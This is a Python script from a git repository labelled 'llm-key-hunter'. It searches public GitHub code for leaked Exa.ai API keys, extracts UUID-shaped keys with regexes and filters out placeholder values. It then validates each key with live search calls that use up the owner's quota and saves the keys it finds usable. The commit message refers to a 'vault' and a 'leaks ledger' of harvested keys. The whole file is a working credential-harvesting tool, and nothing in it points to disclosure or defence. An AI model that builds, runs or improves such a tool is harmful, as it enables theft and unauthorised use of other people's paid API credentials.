Files
hack/tools/scripts/llm-key-hunter/hunt_exa.py
T
OpenCode 68a9071cf1 feat: reconcile local master with origin (exa/hot-platform hunters, leaks ledger, latest results)
Local branch had diverged from origin/master (sibling commits on the same base). Rewrote local history linearly on top of origin/master, folding in all local content: exa/hot-platform discovery hunters, leaks ledger, nightly sweep orchestrator, updated .gitignore and skill docs, plus the latest hunt output and vault state. Remote-only files (vault keys, channel scripts) were restored rather than dropped, so the resulting tree is a full union of both sides.
2026-08-07 12:53:47 +08:00

315 lines
12 KiB
Python

#!/usr/bin/env python3
"""Exa.ai API key hunter.
Pipeline:
1. GitHub code search for Exa key material (env vars / endpoints).
2. Extract UUID-shaped keys CONTEXT-GATED: only keep a UUID when an
EXA_*_KEY assignment, `api.exa.ai` endpoint, or Exa SDK call sits
within ~80 chars (bare UUIDs are way too noisy to accept raw).
3. Verify with a real POST https://api.exa.ai/search (minimal query).
Exa has NO free /models endpoint — a genuine search call is the only
cheap auth probe. Costs one search against the key's quota (free
tiers are ~100 credits/mo; paid is USD 0.007/search). Only 401 = DEAD.
Classification:
- 200 + "results" -> USABLE (real search returned)
- 401 -> DEAD (INVALID_API_KEY tag)
- 429 -> NO_BALANCE (rate-limited: key valid, no headroom)
- 402 -> NO_BALANCE (x402 payment wall on no-key path)
- 403 / 400 / 5xx -> NO_ACCESS
- network fail -> UNKNOWN
API facts (probed 2026-08-06):
- both `x-api-key: <uuid>` and `Authorization: Bearer <uuid>` work
- invalid key -> 401 {"error":"Invalid API key","tag":"INVALID_API_KEY"}
- NO key -> 402 with full x402 crypto-payment payload (Base/Solana USDC)
"""
import argparse
import json
import os
import re
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent))
from hunt_ai_tools import gh_opener, direct_opener, github_token, http_get
from verify_cache import CachedVerifier
# ----------------------------- config -------------------------------------
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
UA = "curl/8.5.0"
BASE = "https://api.exa.ai"
OUT = Path(__file__).parent / "results" / "exa"
OUT.mkdir(parents=True, exist_ok=True)
# GitHub code-search queries. Code search is ~10/min authenticated, no wildcards.
SEARCH_QUERIES = [
"EXA_API_KEY",
"exa_api_key",
"EXA_KEY",
'"api.exa.ai"',
'"exa" apiKey',
]
# UUID shape — Exa keys are plain UUIDs (no prefix, no dashes-stripped variant).
UUID_RE = re.compile(
r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}")
# env assignment: EXA_API_KEY=... / ExaApiKey: ... / "exa_api_key": "..."
ENV_ASSIGN_RE = re.compile(
r'\b(?:exa[a-z0-9_]*)(?:api[_-]?key|key|token)\s*[:=]\s*["\']?'
r'([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})')
# SDK: Exa(apiKey="...") / {"apiKey": "..."} / "api-key": "..."
SDK_KEY_RE = re.compile(
r'["\']?(?:api[_-]?key|apiKey|API_KEY)["\']?\s*[:=]\s*["\']'
r'([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})')
# Auth headers: x-api-key: <uuid> / Authorization: Bearer <uuid>
AUTH_HDR_RE = re.compile(
r'(?:x-api-key|authorization)\s*:\s*(?:bearer\s+)?'
r'([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})',
re.IGNORECASE)
FAKE_SNIPPETS = (
"00000000-0000", "11111111-1111", "ffffffff-ffff", "example",
"placeholder", "your-", "changeme", "xxxx", "12345678-1234",
"replace", "00000000-0000-0000-0000-000000000000",
"550e8400-e29b-41d4-a716-446655440000", # RFC 4122 sample UUID
"0190a1b2-c3d4-7e5f-8a9b-001122334455", # textbook fake from docs
"11112222-3333-4444-2222-555522226666", # keyboard-pattern fake
)
# files that are documentation, not code — UUIDs there are almost always
# illustrative samples (the 8 dead exa candidates all came from *.md docs)
DOC_MD_RE = re.compile(r"\.md$", re.I)
def _looks_fake_uuid(key):
"""Reject sequential / repeated-segment UUIDs (00112233, 55552222...)."""
low = key.lower()
if any(f in low for f in ("550e8400", "0190a1b2", "11112222")):
return True
for seg in low.split("-"):
if len(seg) < 4:
continue
if len(set(seg)) <= 2:
return True # 5555, 2222, 1111-2222 patterns
for i in range(len(seg) - 3):
c = seg[i:i + 4]
if c.isdigit() and all(int(c[j]) == int(c[0]) + j for j in range(4)):
return True # sequential run: 001122, 1234...
return False
def _context_matches(text, start, end):
"""Does the window around [start,end) smell like Exa?"""
lo = max(0, start - 80)
hi = min(len(text), end + 80)
window = text[lo:hi].lower()
return any(k in window for k in (
"exa", "api.exa.ai", "exa.ai", "exa_search", "exa-search", "exasearch"))
def extract_exa(text):
"""Yield (key, detail) UUIDs plausibly belonging to Exa."""
low = text.lower()
seen = set()
has_exa = ("exa" in low)
def emit(key, detail):
if key in seen:
return
if key.startswith("00000000") or key[:8] == "11111111":
return
if _looks_fake_uuid(key):
return
if any(f in key.lower() for f in FAKE_SNIPPETS):
return
seen.add(key)
yield key, detail
# 1) explicit Exa env assignments (strongest signal, no window needed)
for m in ENV_ASSIGN_RE.finditer(text):
yield from emit(m.group(1), "env-assign")
# 2) SDK apiKey fields — require exa mention anywhere in the file
if has_exa:
for m in SDK_KEY_RE.finditer(text):
yield from emit(m.group(1), f"sdk:{m.group(0)[:40]}")
# 3) auth headers — require exa window
if has_exa:
for m in AUTH_HDR_RE.finditer(text):
if _context_matches(text, m.start(), m.end()):
yield from emit(m.group(1), "auth-header")
# 4) bare UUIDs near an api.exa.ai endpoint or Exa() call
if has_exa:
for m in UUID_RE.finditer(text):
if _context_matches(text, m.start(), m.end()):
yield from emit(m.group(0), "uuid-near-exa")
def fetch_raw(url, timeout=20):
"""Fetch file content, honoring GH_PROXY like the rest of the toolkit."""
raw = (url.replace("github.com", "raw.githubusercontent.com")
.replace("/blob/", "/"))
req = urllib.request.Request(raw, headers={"User-Agent": UA, "Accept": "*/*"})
try:
with gh_opener().open(req, timeout=timeout) as r:
return r.read().decode("utf-8", "replace")
except Exception as e:
return None
# ---------------------------------------------------------------- verify ------------
def verify_key(key, timeout=20):
"""One minimal Exa search. Returns (verdict, detail)."""
payload = json.dumps({"query": "auto", "numResults": 1, "type": "auto"}).encode()
req = urllib.request.Request(
BASE + "/search", data=payload, method="POST",
headers={"User-Agent": UA, "Accept": "*/*",
"Content-Type": "application/json", "x-api-key": key})
try:
with direct_opener().open(req, timeout=timeout) as r:
body = r.read().decode("utf-8", "replace")
if '"results"' in body:
return "USABLE", f"200 search ok {body[:100]}"
return "NO_ACCESS", f"200 but no results: {body[:120]}"
except urllib.error.HTTPError as e:
try:
body = e.read().decode("utf-8", "replace")
except Exception:
body = ""
c = e.code
if c == 401:
return "DEAD", f"401 {body[:100]}"
if c in (402, 429):
return "NO_BALANCE", f"{c} {body[:120]}"
if 500 <= c < 600:
return "NO_ACCESS", f"5xx {c}: {body[:120]}"
return "NO_ACCESS", f"HTTP {c}: {body[:140]}"
except Exception as e:
return "UNKNOWN", f"net:{type(e).__name__}: {e}"
# ---------------------------------------------------------------- main --------------
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--workers", type=int, default=8)
ap.add_argument("--pages", type=int, default=2,
help="max result pages per query (100 hits/page)")
ap.add_argument("--no-verify", action="store_true")
ap.add_argument("--no-cache", action="store_true")
args = ap.parse_args()
token = github_token()
print(f"proxy={GH_PROXY} token={'yes' if token else 'NO'}", flush=True)
# 1) search
files = {}
for q in SEARCH_QUERIES:
print(f"search {q!r}", flush=True)
for page in range(1, args.pages + 1):
url = ("https://api.github.com/search/code?"
f"q={urllib.parse.quote(q)}&per_page=100&page={page}")
code, body, hdrs = http_get(url, token=token)
if code == 200:
try:
items = json.loads(body).get("items", [])
except Exception:
items = []
for it in items:
files[it["html_url"]] = it
if len(items) < 100:
break
time.sleep(2.2)
elif code in (403, 429):
reset = hdrs.get("X-RateLimit-Reset")
wait = max(int(reset) - int(time.time()), 5) if reset else 30
print(f" rate-limited, sleeping {wait}s", file=sys.stderr, flush=True)
time.sleep(wait + 1)
else:
print(f" search HTTP {code}: {body[:120]}", file=sys.stderr)
break
print(f"candidate files: {len(files)}", flush=True)
if not files:
print("nothing to extract.")
return
# 2) extract from raw content
candidates = {} # key -> {url, detail}
with ThreadPoolExecutor(max_workers=12) as pool:
futs = {pool.submit(fetch_raw, u): u for u in files}
for fut in as_completed(futs):
u = futs[fut]
try:
text = fut.result()
except Exception:
text = None
if not text:
continue
for key, detail in extract_exa(text):
# docs (*.md) rarely hold real keys — only keep explicit
# env-assignments from them (strong signal)
if DOC_MD_RE.search(u) and detail != "env-assign":
continue
candidates.setdefault(key, {"url": u, "detail": detail})
print(f"extracted candidates: {len(candidates)}", flush=True)
with (OUT / "extracted_keys.txt").open("w") as f:
for k, meta in sorted(candidates.items()):
f.write(f"{k}|{meta['url']}|{meta['detail']}\n")
if args.no_verify:
print("--no-verify, done.")
return
# 3) verify
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [], "UNKNOWN": [], "DEAD": []}
with CachedVerifier("exa", verify_key, force=args.no_cache) as ver:
with ThreadPoolExecutor(max_workers=args.workers) as pool:
futs = {pool.submit(ver, k): k for k in candidates}
done = 0
for fut in as_completed(futs):
k = futs[fut]
done += 1
try:
v, d = fut.result()
except Exception as e:
v, d = "UNKNOWN", f"exc:{e}"
buckets[v].append((k, candidates[k], d))
if done % 20 == 0:
print(f" {done}/{len(candidates)} usable={len(buckets['USABLE'])} "
f"dead={len(buckets['DEAD'])}", flush=True)
for label, fn in (("USABLE", "usable.txt"), ("NO_BALANCE", "no_balance.txt"),
("NO_ACCESS", "no_access.txt"), ("UNKNOWN", "unknown.txt"),
("DEAD", "dead.txt")):
with (OUT / fn).open("w") as f:
for k, meta, d in buckets[label]:
f.write(f"{k}|{meta['url']}|{d}\n")
print()
for label in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
print(f" {label:11s}: {len(buckets[label])}")
if buckets["USABLE"]:
print("\n=== USABLE EXA KEYS ===")
for k, meta, d in buckets["USABLE"]:
print(f" {k}\n {meta['url']}\n {d[:120]}")
if __name__ == "__main__":
main()